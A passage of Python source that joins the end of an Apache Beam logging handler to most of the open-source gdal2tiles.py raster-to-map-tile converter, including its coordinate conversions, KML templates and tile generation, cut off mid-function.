Acquiring the handler lock ensures ``emit`` is not run until the lock is # released. self.acquire() self._log_entry_queue.put(self._FINISHED, timeout=5) # wait on server to close. self._reader.join() self.release() # Unregister this handler. super(FnApiLogRecordHandler, self).close() except Exception: # Log rather than raising exceptions, to avoid clobbering # underlying errors that may have caused this to close # prematurely. logging.error("Error closing the logging channel.", exc_info=True) def _write_log_entries(self): done = False while not done: log_entries = [self._log_entry_queue.get()] try: for _ in range(self._MAX_BATCH_SIZE): log_entries.append(self._log_entry_queue.get_nowait()) except queue.Empty: pass if log_entries[-1] is self._FINISHED: done = True log_entries.pop() if log_entries: yield beam_fn_api_pb2.LogEntry.List(log_entries=log_entries) def _read_log_control_messages(self): # Only reconnect when we are alive. # We can drop some logs in the unlikely event of logging connection # dropped(not closed) during termination when we still have logs to be sent. # This case is unlikely and the chance of reconnection and successful # transmission of logs is also very less as the process is terminating. # I choose not to handle this case to avoid un-necessary code complexity. while self._alive: # Loop for reconnection. log_control_iterator = self.connect() if self._dropped_logs > 0: logging.warning("Dropped %d logs while logging client disconnected", self._dropped_logs) self._dropped_logs = 0 try: for _ in log_control_iterator: # Loop for consuming messages from server. # TODO(vikasrk): Handle control messages. pass # iterator is closed return except Exception as ex: print("Logging client failed: {}... resetting".format(ex), file=sys.stderr) # Wait a bit before trying a reconnect time.sleep(0.5) # 0.5 seconds
gdal2tiles.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # ****************************************************************************** # $Id$ # # Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/) # Support: BRGM (http://www.brgm.fr) # Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory. # - generate Google Earth metadata (KML SuperOverlay) # - generate simple HTML viewer based on Google Maps and OpenLayers # - support of global tiles (Spherical Mercator) for compatibility # with interactive web maps a la Google Maps # Author: Klokan Petr Pridal, klokan at klokan dot cz # Web: http://www.klokan.cz/projects/gdal2tiles/ # GUI: http://www.maptiler.org/ # ############################################################################### # Copyright (c) 2008, Klokan Petr Pridal # Copyright (c) 2010-2013, Even Rouault <even dot rouault at mines-paris dot org> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. # ****************************************************************************** from __future__ import print_function, division import math from multiprocessing import Pipe, Pool, Process, Manager import os import tempfile import shutil import sys from uuid import uuid4 from xml.etree import ElementTree from osgeo import gdal from osgeo import osr try: from PIL import Image import numpy import osgeo.gdal_array as gdalarray except Exception: # 'antialias' resampling is not available pass __version__ = "$Id$" resampling_list = ('average', 'near', 'bilinear', 'cubic', 'cubicspline', 'lanczos', 'antialias') profile_list = ('mercator', 'geodetic', 'raster') webviewer_list = ('all', 'google', 'openlayers', 'leaflet', 'none') # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = """ globalmaptiles.py Global Map Tiles as defined in Tile Map Service (TMS) Profiles ============================================================== Functions necessary for generation of global tiles used on the web. It contains classes implementing coordinate conversions for: - GlobalMercator (based on EPSG:3857) for Google Maps, Yahoo Maps, Bing Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by Klokan Petr Pridal on 2008-07-03. Google Summer of Code 2008, project GDAL2Tiles for OSGEO. In case you use this class in your product, translate it to another language or find it useful for your project please let me know. My email: klokan at klokan dot cz. I would like to know where it was used. Class is available under the open-source GDAL license (www.gdal.org). """ MAXZOOMLEVEL = 32 class GlobalMercator(object): r""" TMS Global Mercator Profile --------------------------- Functions necessary for generation of tiles in Spherical Mercator projection, EPSG:3857. Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps, UK Ordnance Survey OpenSpace API, ... and you can overlay them on top of base maps of those web mapping applications. Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left). What coordinate conversions do we need for TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon XY in meters XY pixels Z zoom XYZ from TMS EPSG:4326 EPSG:387 .----. --------- -- TMS / \ <-> | | <-> /----/ <-> Google \ / | | /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients TileMapService What is the coordinate extent of Earth in EPSG:3857? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of the Earth in meters, which is 40 thousand kilometers, the coordinate origin is in the middle of extent. In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:3857 Polar areas with abs(latitude) bigger then 85.05112878 are clipped off. What are zoom level constants (pixels/meter) for pyramid with EPSG:3857? whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile, every lower zoom level resolution is always divided by two initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062 What is the difference between TMS and Google Maps/QuadTree tile name convention? The tile raster itself is the same (equal extent, projection, pixel size), there is just different identification of the same raster tile. Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ. Google placed the origin [0,0] to the top-left corner, reference is XYZ. Microsoft is referencing tiles by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yes? Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum. Well, the web clients like Google Maps are projecting those coordinates by Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if the were on the WGS84 ellipsoid. From MSDN documentation: To simplify the calculations, we use the spherical form of projection, not the ellipsoidal form. Since the projection is used only for map display, and not for displaying numeric coordinates, we don't need the extra precision of an ellipsoidal projection. The spherical projection causes approximately 0.33 percent scale distortion in the Y direction, which is not visually noticeable. How do I create a raster in EPSG:3857 and convert coordinates with PROJ.4? You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform. All of the tools supports -t_srs 'epsg:3857'. For other GIS programs check the exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is designated as EPSG:3857. WKT definition is in the official EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format of EPSG:3857: PROJCS["Google Maps Global Mercator", GEOGCS["WGS 84", DATUM["WGS_1984", SPHEROID["WGS 84",6378137,298.257223563, AUTHORITY["EPSG","7030"]], AUTHORITY["EPSG","6326"]], PRIMEM["Greenwich",0], UNIT["degree",0.0174532925199433], AUTHORITY["EPSG","4326"]], PROJECTION["Mercator_1SP"], PARAMETER["central_meridian",0], PARAMETER["scale_factor",1], PARAMETER["false_easting",0], PARAMETER["false_northing",0], UNIT["metre",1, AUTHORITY["EPSG","9001"]]] """ def __init__(self, tileSize=256): "Initialize the TMS Global Mercator pyramid" self.tileSize = tileSize self.initialResolution = 2 * math.pi * 6378137 / self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift = 2 * math.pi * 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon): "Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:3857" mx = lon * self.originShift / 180.0 my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0) my = my * self.originShift / 180.0 return mx, my def MetersToLatLon(self, mx, my): "Converts XY point from Spherical Mercator EPSG:3857 to lat/lon in WGS84 Datum" lon = (mx / self.originShift) * 180.0 lat = (my / self.originShift) * 180.0 lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0) return lat, lon def PixelsToMeters(self, px, py, zoom): "Converts pixel coordinates in given zoom level of pyramid to EPSG:3857" res = self.Resolution(zoom) mx = px * res - self.originShift my = py * res - self.originShift return mx, my def MetersToPixels(self, mx, my, zoom): "Converts EPSG:3857 to pyramid pixel coordinates in given zoom level" res = self.Resolution(zoom) px = (mx + self.originShift) / res py = (my + self.originShift) / res return px, py def PixelsToTile(self, px, py): "Returns a tile covering region in given pixel coordinates" tx = int(math.ceil(px / float(self.tileSize)) - 1) ty = int(math.ceil(py / float(self.tileSize)) - 1) return tx, ty def PixelsToRaster(self, px, py, zoom): "Move the origin of pixel coordinates to top-left corner" mapSize = self.tileSize << zoom return px, mapSize - py def MetersToTile(self, mx, my, zoom): "Returns tile for given mercator coordinates" px, py = self.MetersToPixels(mx, my, zoom) return self.PixelsToTile(px, py) def TileBounds(self, tx, ty, zoom): "Returns bounds of the given tile in EPSG:3857 coordinates" minx, miny = self.PixelsToMeters(tx * self.tileSize, ty * self.tileSize, zoom) maxx, maxy = self.PixelsToMeters((tx + 1) * self.tileSize, (ty + 1) * self.tileSize, zoom) return (minx, miny, maxx, maxy) def TileLatLonBounds(self, tx, ty, zoom): "Returns bounds of the given tile in latitude/longitude using WGS84 datum" bounds = self.TileBounds(tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return (minLat, minLon, maxLat, maxLon) def Resolution(self, zoom): "Resolution (meters/pixel) for given zoom level (measured at Equator)" # return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize): "Maximal scaledown zoom of the pyramid closest to the pixelSize." for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i != -1: return i - 1 else: return 0 # We don't want to scale up def GoogleTile(self, tx, ty, zoom): "Converts TMS tile coordinates to Google Tile coordinates" # coordinate origin is moved from bottom-left to top-left corner of the extent return tx, (2**zoom - 1) - ty def QuadTree(self, tx, ty, zoom): "Converts TMS tile coordinates to Microsoft QuadTree" quadKey = "" ty = (2**zoom - 1) - ty for i in range(zoom, 0, -1): digit = 0 mask = 1 << (i - 1) if (tx & mask) != 0: digit += 1 if (ty & mask) != 0: digit += 2 quadKey += str(digit) return quadKey class GlobalGeodetic(object): r""" TMS Global Geodetic Profile --------------------------- Functions necessary for generation of global tiles in Plate Carre projection, EPSG:4326, "unprojected profile". Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters) and you can overlay the tiles on top of OpenLayers base map. Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left). What coordinate conversions do we need for TMS Global Geodetic tiles? Global Geodetic tiles are using geodetic coordinates (latitude,longitude) directly as planar coordinates XY (it is also called Unprojected or Plate Carre). We need only scaling to pixel pyramid and cutting to tiles. Pyramid has on top level two tiles, so it is not square but rectangle. Area [-180,-90,180,90] is scaled to 512x256 pixels. TMS has coordinate origin (for pixels and tiles) in bottom-left corner. Rasters are in EPSG:4326 and therefore are compatible with Google Earth. LatLon <-> Pixels <-> Tiles WGS84 coordinates Pixels in pyramid Tiles in pyramid lat/lon XY pixels Z zoom XYZ from TMS EPSG:4326 .----. ---- / \ <-> /--------/ <-> TMS \ / /--------------/ ----- /--------------------/ WMS, KML Web Clients, Google Earth TileMapService """ def __init__(self, tmscompatible, tileSize=256): self.tileSize = tileSize if tmscompatible is not None: # Defaults the resolution factor to 0.703125 (2 tiles @ level 0) # Adhers to OSGeo TMS spec # http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic self.resFact = 180.0 / self.tileSize else: # Defaults the resolution factor to 1.40625 (1 tile @ level 0) # Adheres OpenLayers, MapProxy, etc default resolution for WMTS self.resFact = 360.0 / self.tileSize def LonLatToPixels(self, lon, lat, zoom): "Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid" res = self.resFact / 2**zoom px = (180 + lon) / res py = (90 + lat) / res return px, py def PixelsToTile(self, px, py): "Returns coordinates of the tile covering region in pixel coordinates" tx = int(math.ceil(px / float(self.tileSize)) - 1) ty = int(math.ceil(py / float(self.tileSize)) - 1) return tx, ty def LonLatToTile(self, lon, lat, zoom): "Returns the tile for zoom which covers given lon/lat coordinates" px, py = self.LonLatToPixels(lon, lat, zoom) return self.PixelsToTile(px, py) def Resolution(self, zoom): "Resolution (arc/pixel) for given zoom level (measured at Equator)" return self.resFact / 2**zoom def ZoomForPixelSize(self, pixelSize): "Maximal scaledown zoom of the pyramid closest to the pixelSize." for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i != 0: return i - 1 else: return 0 # We don't want to scale up def TileBounds(self, tx, ty, zoom): "Returns bounds of the given tile" res = self.resFact / 2**zoom return ( tx * self.tileSize * res - 180, ty * self.tileSize * res - 90, (tx + 1) * self.tileSize * res - 180, (ty + 1) * self.tileSize * res - 90 ) def TileLatLonBounds(self, tx, ty, zoom): "Returns bounds of the given tile in the SWNE form" b = self.TileBounds(tx, ty, zoom) return (b[1], b[0], b[3], b[2]) class Zoomify(object): """ Tiles compatible with the Zoomify viewer ---------------------------------------- """ def __init__(self, width, height, tilesize=256, tileformat='jpg'): """Initialization of the Zoomify tile tree""" self.tilesize = tilesize self.tileformat = tileformat imagesize = (width, height) tiles = (math.ceil(width / tilesize), math.ceil(height / tilesize)) # Size (in tiles) for each tier of pyramid. self.tierSizeInTiles = [] self.tierSizeInTiles.append(tiles) # Image size in pixels for each pyramid tierself self.tierImageSize = [] self.tierImageSize.append(imagesize) while (imagesize[0] > tilesize or imagesize[1] > tilesize): imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2)) tiles = (math.ceil(imagesize[0] / tilesize), math.ceil(imagesize[1] / tilesize)) self.tierSizeInTiles.append(tiles) self.tierImageSize.append(imagesize) self.tierSizeInTiles.reverse() self.tierImageSize.reverse() # Depth of the Zoomify pyramid, number of tiers (zoom levels) self.numberOfTiers = len(self.tierSizeInTiles) # Number of tiles up to the given tier of pyramid. self.tileCountUpToTier = [] self.tileCountUpToTier[0] = 0 for i in range(1, self.numberOfTiers + 1): self.tileCountUpToTier.append( self.tierSizeInTiles[i - 1][0] * self.tierSizeInTiles[i - 1][1] + self.tileCountUpToTier[i - 1] ) def tilefilename(self, x, y, z): """Returns filename for tile with given coordinates""" tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z] return os.path.join("TileGroup%.0f" % math.floor(tileIndex / 256), "%s-%s-%s.%s" % (z, x, y, self.tileformat)) class GDALError(Exception): pass def exit_with_error(message, details=""): # Message printing and exit code kept from the way it worked using the OptionParser (in case # someone parses the error output) sys.stderr.write("Usage: gdal2tiles.py [options] input_file [output]\n\n") sys.stderr.write("gdal2tiles.py: error: %s\n" % message) if details: sys.stderr.write("\n\n%s\n" % details) sys.exit(2) def generate_kml(tx, ty, tz, tileext, tilesize, tileswne, options, children=None, **args): """ Template for the KML. Returns filled string. """ if not children: children = [] args['tx'], args['ty'], args['tz'] = tx, ty, tz args['tileformat'] = tileext if 'tilesize' not in args: args['tilesize'] = tilesize if 'minlodpixels' not in args: args['minlodpixels'] = int(args['tilesize'] / 2) if 'maxlodpixels' not in args: args['maxlodpixels'] = int(args['tilesize'] * 8) if children == []: args['maxlodpixels'] = -1 if tx is None: tilekml = False args['title'] = options.title else: tilekml = True args['title'] = "%d/%d/%d.kml" % (tz, tx, ty) args['south'], args['west'], args['north'], args['east'] = tileswne(tx, ty, tz) if tx == 0: args['drawOrder'] = 2 * tz + 1 elif tx is not None: args['drawOrder'] = 2 * tz else: args['drawOrder'] = 0 url = options.url if not url: if tilekml: url = "../../" else: url = "" s = """<?xml version="1.0" encoding="utf-8"?> <kml xmlns="http://www.opengis.net/kml/2.2"> <Document> <name>%(title)s</name> <description></description> <Style> <ListStyle id="hideChildren"> <listItemType>checkHideChildren</listItemType> </ListStyle> </Style>""" % args if tilekml: s += """ <Region> <LatLonAltBox> <north>%(north).14f</north> <south>%(south).14f</south> <east>%(east).14f</east> <west>%(west).14f</west> </LatLonAltBox> <Lod> <minLodPixels>%(minlodpixels)d</minLodPixels> <maxLodPixels>%(maxlodpixels)d</maxLodPixels> </Lod> </Region> <GroundOverlay> <drawOrder>%(drawOrder)d</drawOrder> <Icon> <href>%(ty)d.%(tileformat)s</href> </Icon> <LatLonBox> <north>%(north).14f</north> <south>%(south).14f</south> <east>%(east).14f</east> <west>%(west).14f</west> </LatLonBox> </GroundOverlay> """ % args for cx, cy, cz in children: csouth, cwest, cnorth, ceast = tileswne(cx, cy, cz) s += """ <NetworkLink> <name>%d/%d/%d.%s</name> <Region> <LatLonAltBox> <north>%.14f</north> <south>%.14f</south> <east>%.14f</east> <west>%.14f</west> </LatLonAltBox> <Lod> <minLodPixels>%d</minLodPixels> <maxLodPixels>-1</maxLodPixels> </Lod> </Region> <Link> <href>%s%d/%d/%d.kml</href> <viewRefreshMode>onRegion</viewRefreshMode> <viewFormat/> </Link> </NetworkLink> """ % (cz, cx, cy, args['tileformat'], cnorth, csouth, ceast, cwest, args['minlodpixels'], url, cz, cx, cy) s += """ </Document> </kml> """ return s def scale_query_to_tile(dsquery, dstile, tiledriver, options, tilefilename=''): """Scales down query dataset to the tile dataset""" querysize = dsquery.RasterXSize tilesize = dstile.RasterXSize tilebands = dstile.RasterCount if options.resampling == 'average': # Function: gdal.RegenerateOverview() for i in range(1, tilebands + 1): # Black border around NODATA res = gdal.RegenerateOverview(dsquery.GetRasterBand(i), dstile.GetRasterBand(i), 'average') if res != 0: exit_with_error("RegenerateOverview() failed on %s, error %d" % ( tilefilename, res)) elif options.resampling == 'antialias': # Scaling by PIL (Python Imaging Library) - improved Lanczos array = numpy.zeros((querysize, querysize, tilebands), numpy.uint8) for i in range(tilebands): array[:, :, i] = gdalarray.BandReadAsArray(dsquery.GetRasterBand(i + 1), 0, 0, querysize, querysize) im = Image.fromarray(array, 'RGBA') # Always four bands im1 = im.resize((tilesize, tilesize), Image.ANTIALIAS) if os.path.exists(tilefilename): im0 = Image.open(tilefilename) im1 = Image.composite(im1, im0, im1) im1.save(tilefilename, tiledriver) else: if options.resampling == 'near': gdal_resampling = gdal.GRA_NearestNeighbour elif options.resampling == 'bilinear': gdal_resampling = gdal.GRA_Bilinear elif options.resampling == 'cubic': gdal_resampling = gdal.GRA_Cubic elif options.resampling == 'cubicspline': gdal_resampling = gdal.GRA_CubicSpline elif options.resampling == 'lanczos': gdal_resampling = gdal.GRA_Lanczos # Other algorithms are implemented by gdal.ReprojectImage(). dsquery.SetGeoTransform((0.0, tilesize / float(querysize), 0.0, 0.0, 0.0, tilesize / float(querysize))) dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0)) res = gdal.ReprojectImage(dsquery, dstile, None, None, gdal_resampling) if res != 0: exit_with_error("ReprojectImage() failed on %s, error %d" % (tilefilename, res)) def setup_no_data_values(input_dataset, options): """ Extract the NODATA values from the dataset or use the passed arguments as override if any """ in_nodata = [] if options.srcnodata: nds = list(map(float, options.srcnodata.split(','))) if len(nds) < input_dataset.RasterCount: in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount] else: in_nodata = nds else: for i in range(1, input_dataset.RasterCount + 1): raster_no_data = input_dataset.GetRasterBand(i).GetNoDataValue() if raster_no_data is not None: in_nodata.append(raster_no_data) if options.verbose: print("NODATA: %s" % in_nodata) return in_nodata def setup_input_srs(input_dataset, options): """ Determines and returns the Input Spatial Reference System (SRS) as an osr object and as a WKT representation Uses in priority the one passed in the command line arguments. If None, tries to extract them from the input dataset """ input_srs = None input_srs_wkt = None if options.s_srs: input_srs = osr.SpatialReference() input_srs.SetFromUserInput(options.s_srs) input_srs_wkt = input_srs.ExportToWkt() else: input_srs_wkt = input_dataset.GetProjection() if not input_srs_wkt and input_dataset.GetGCPCount() != 0: input_srs_wkt = input_dataset.GetGCPProjection() if input_srs_wkt: input_srs = osr.SpatialReference() input_srs.ImportFromWkt(input_srs_wkt) return input_srs, input_srs_wkt def setup_output_srs(input_srs, options): """ Setup the desired SRS (based on options) """ output_srs = osr.SpatialReference() if options.profile == 'mercator': output_srs.ImportFromEPSG(3857) elif options.profile == 'geodetic': output_srs.ImportFromEPSG(4326) else: output_srs = input_srs return output_srs def has_georeference(dataset): return (dataset.GetGeoTransform() != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) or dataset.GetGCPCount() != 0) def reproject_dataset(from_dataset, from_srs, to_srs, options=None): """ Returns the input dataset in the expected "destination" SRS. If the dataset is already in the correct SRS, returns it unmodified """ if not from_srs or not to_srs: raise GDALError("from and to SRS must be defined to reproject the dataset") if (from_srs.ExportToProj4() != to_srs.ExportToProj4()) or (from_dataset.GetGCPCount() != 0): to_dataset = gdal.AutoCreateWarpedVRT(from_dataset, from_srs.ExportToWkt(), to_srs.ExportToWkt()) if options and options.verbose: print("Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')") to_dataset.GetDriver().CreateCopy("tiles.vrt", to_dataset) return to_dataset else: return from_dataset def add_gdal_warp_options_to_string(vrt_string, warp_options): if not warp_options: return vrt_string vrt_root = ElementTree.fromstring(vrt_string) options = vrt_root.find("GDALWarpOptions") if options is None: return vrt_string for key, value in warp_options.items(): tb = ElementTree.TreeBuilder() tb.start("Option", {"name": key}) tb.data(value) tb.end("Option") elem = tb.close() options.insert(0, elem) return ElementTree.tostring(vrt_root).decode() def update_no_data_values(warped_vrt_dataset, nodata_values, options=None): """ Takes an array of NODATA values and forces them on the WarpedVRT file dataset passed """ # TODO: gbataille - Seems that I forgot tests there if nodata_values != []: temp_file = gettempfilename('-gdal2tiles.vrt') warped_vrt_dataset.GetDriver().CreateCopy(temp_file, warped_vrt_dataset) with open(temp_file, 'r') as f: vrt_string = f.read() vrt_string = add_gdal_warp_options_to_string( vrt_string, {"INIT_DEST": "NO_DATA", "UNIFIED_SRC_NODATA": "YES"}) # TODO: gbataille - check the need for this replacement. Seems to work without # # replace BandMapping tag for NODATA bands.... # for i in range(len(nodata_values)): # s = s.replace( # '<BandMapping src="%i" dst="%i"/>' % ((i+1), (i+1)), # """ # <BandMapping src="%i" dst="%i"> # <SrcNoDataReal>%i</SrcNoDataReal> # <SrcNoDataImag>0</SrcNoDataImag> # <DstNoDataReal>%i</DstNoDataReal> # <DstNoDataImag>0</DstNoDataImag> # </BandMapping> # """ % ((i+1), (i+1), nodata_values[i], nodata_values[i])) # save the corrected VRT with open(temp_file, 'w') as f: f.write(vrt_string) corrected_dataset = gdal.Open(temp_file) os.unlink(temp_file) # set NODATA_VALUE metadata corrected_dataset.SetMetadataItem( 'NODATA_VALUES', ' '.join([str(i) for i in nodata_values])) if options and options.verbose: print("Modified warping result saved into 'tiles1.vrt'") # TODO: gbataille - test replacing that with a gdal write of the dataset (more # accurately what's used, even if should be the same with open("tiles1.vrt", "w") as f: f.write(vrt_string) return corrected_dataset def add_alpha_band_to_string_vrt(vrt_string): # TODO: gbataille - Old code speak of this being equivalent to gdalwarp -dstalpha # To be checked vrt_root = ElementTree.fromstring(vrt_string) index = 0 nb_bands = 0 for subelem in list(vrt_root): if subelem.tag == "VRTRasterBand": nb_bands += 1 color_node = subelem.find("./ColorInterp") if color_node is not None and color_node.text == "Alpha": raise Exception("Alpha band already present") else: if nb_bands: # This means that we are one element after the Band definitions break index += 1 tb = ElementTree.TreeBuilder() tb.start("VRTRasterBand", {'dataType': "Byte", "band": str(nb_bands + 1), "subClass": "VRTWarpedRasterBand"}) tb.start("ColorInterp", {}) tb.data("Alpha") tb.end("ColorInterp") tb.end("VRTRasterBand") elem = tb.close() vrt_root.insert(index, elem) warp_options = vrt_root.find(".//GDALWarpOptions") tb = ElementTree.TreeBuilder() tb.start("DstAlphaBand", {}) tb.data(str(nb_bands + 1)) tb.end("DstAlphaBand") elem = tb.close() warp_options.append(elem) # TODO: gbataille - this is a GDALWarpOptions. Why put it in a specific place? tb = ElementTree.TreeBuilder() tb.start("Option", {"name": "INIT_DEST"}) tb.data("0") tb.end("Option") elem = tb.close() warp_options.append(elem) return ElementTree.tostring(vrt_root).decode() def update_alpha_value_for_non_alpha_inputs(warped_vrt_dataset, options=None): """ Handles dataset with 1 or 3 bands, i.e. without alpha channel, in the case the nodata value has not been forced by options """ if warped_vrt_dataset.RasterCount in [1, 3]: tempfilename = gettempfilename('-gdal2tiles.vrt') warped_vrt_dataset.GetDriver().CreateCopy(tempfilename, warped_vrt_dataset) with open(tempfilename) as f: orig_data = f.read() alpha_data = add_alpha_band_to_string_vrt(orig_data) with open(tempfilename, 'w') as f: f.write(alpha_data) warped_vrt_dataset = gdal.Open(tempfilename) os.unlink(tempfilename) if options and options.verbose: print("Modified -dstalpha warping result saved into 'tiles1.vrt'") # TODO: gbataille - test replacing that with a gdal write of the dataset (more # accurately what's used, even if should be the same with open("tiles1.vrt", "w") as f: f.write(alpha_data) return warped_vrt_dataset def nb_data_bands(dataset): """ Return the number of data (non-alpha) bands of a gdal dataset """ alphaband = dataset.GetRasterBand(1).GetMaskBand() if ((alphaband.GetMaskFlags() & gdal.GMF_ALPHA) or dataset.RasterCount == 4 or dataset.RasterCount == 2): return dataset.RasterCount - 1 else: return dataset.RasterCount def gettempfilename(suffix): """Returns a temporary filename""" if '_' in os.environ: # tempfile.mktemp() crashes on some Wine versions (the one of Ubuntu 12.04 particularly) if os.environ['_'].find('wine') >= 0: tmpdir = '.' if 'TMP' in os.environ: tmpdir = os.environ['TMP'] import time import random random.seed(time.time()) random_part = 'file%d' % random.randint(0, 1000000000) return os.path.join(tmpdir, random_part + suffix) return tempfile.mktemp(suffix) def create_base_tile(tile_job_info, tile_detail, queue=None): gdal.AllRegister() dataBandsCount = tile_job_info.nb_data_bands output = tile_job_info.output_file_path tileext = tile_job_info.tile_extension tilesize = tile_job_info.tile_size options = tile_job_info.options tilebands = dataBandsCount + 1 ds = gdal.Open(tile_job_info.src_file, gdal.GA_ReadOnly) mem_drv = gdal.GetDriverByName('MEM') out_drv = gdal.GetDriverByName(tile_job_info.tile_driver) alphaband = ds.GetRasterBand(1).GetMaskBand() tx = tile_detail.tx ty = tile_detail.ty tz = tile_detail.tz rx = tile_detail.rx ry = tile_detail.ry rxsize = tile_detail.rxsize rysize = tile_detail.rysize wx = tile_detail.wx wy = tile_detail.wy wxsize = tile_detail.wxsize wysize = tile_detail.wysize querysize = tile_detail.querysize # Tile dataset in memory tilefilename = os.path.join( output, str(tz), str(tx), "%s.%s" % (ty, tileext)) dstile = mem_drv.Create('', tilesize, tilesize, tilebands) data = alpha = None if options.verbose: print("\tReadRaster Extent: ", (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize)) # Query is in 'nearest neighbour' but can be bigger in then the tilesize # We scale down the query to the tilesize by supplied algorithm. if rxsize != 0 and rysize != 0 and wxsize != 0 and wysize != 0: data = ds.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize, band_list=list(range(1, dataBandsCount + 1))) alpha = alphaband.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize) # The tile in memory is a transparent file by default. Write pixel values into it if # any if data: if tilesize == querysize: # Use the ReadRaster result directly in tiles ('nearest neighbour' query) dstile.WriteRaster(wx, wy, wxsize, wysize, data, band_list=list(range(1, dataBandsCount + 1))) dstile.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands]) # Note: For source drivers based on WaveLet compression (JPEG2000, ECW, # MrSID) the ReadRaster function returns high-quality raster (not ugly # nearest neighbour) # TODO: Use directly 'near' for WaveLet files else: # Big ReadRaster query in memory scaled to the tilesize - all but 'near' # algo dsquery = mem_drv.Create('', querysize, querysize, tilebands) # TODO: fill the null value in case a tile without alpha is produced (now # only png tiles are supported) dsquery.WriteRaster(wx, wy, wxsize, wysize, data, band_list=list(range(1, dataBandsCount + 1))) dsquery.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands]) scale_query_to_tile(dsquery, dstile, tile_job_info.tile_driver, options, tilefilename=tilefilename) del dsquery # Force freeing the memory to make sure the C++ destructor is called and the memory as well as # the file locks are released del ds del data if options.resampling != 'antialias': # Write a copy of tile to png/jpg out_drv.CreateCopy(tilefilename, dstile, strict=0) del dstile # Create a KML file for this tile. if tile_job_info.kml: kmlfilename = os.path.join(output, str(tz), str(tx), '%d.kml' % ty) if not options.resume or not os.path.exists(kmlfilename): with open(kmlfilename, 'wb') as f: f.write(generate_kml( tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size, tile_job_info.tile_swne, tile_job_info.options ).encode('utf-8')) if queue: queue.put("tile %s %s %s" % (tx, ty, tz)) def create_overview_tiles(tile_job_info, output_folder, options): """Generation of the overview tiles (higher in the pyramid) based on existing tiles""" mem_driver = gdal.GetDriverByName('MEM') tile_driver = tile_job_info.tile_driver out_driver = gdal.GetDriverByName(tile_driver) tilebands = tile_job_info.nb_data_bands + 1 # Usage of existing tiles: from 4 underlying tiles generate one as overview. tcount = 0 for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1): 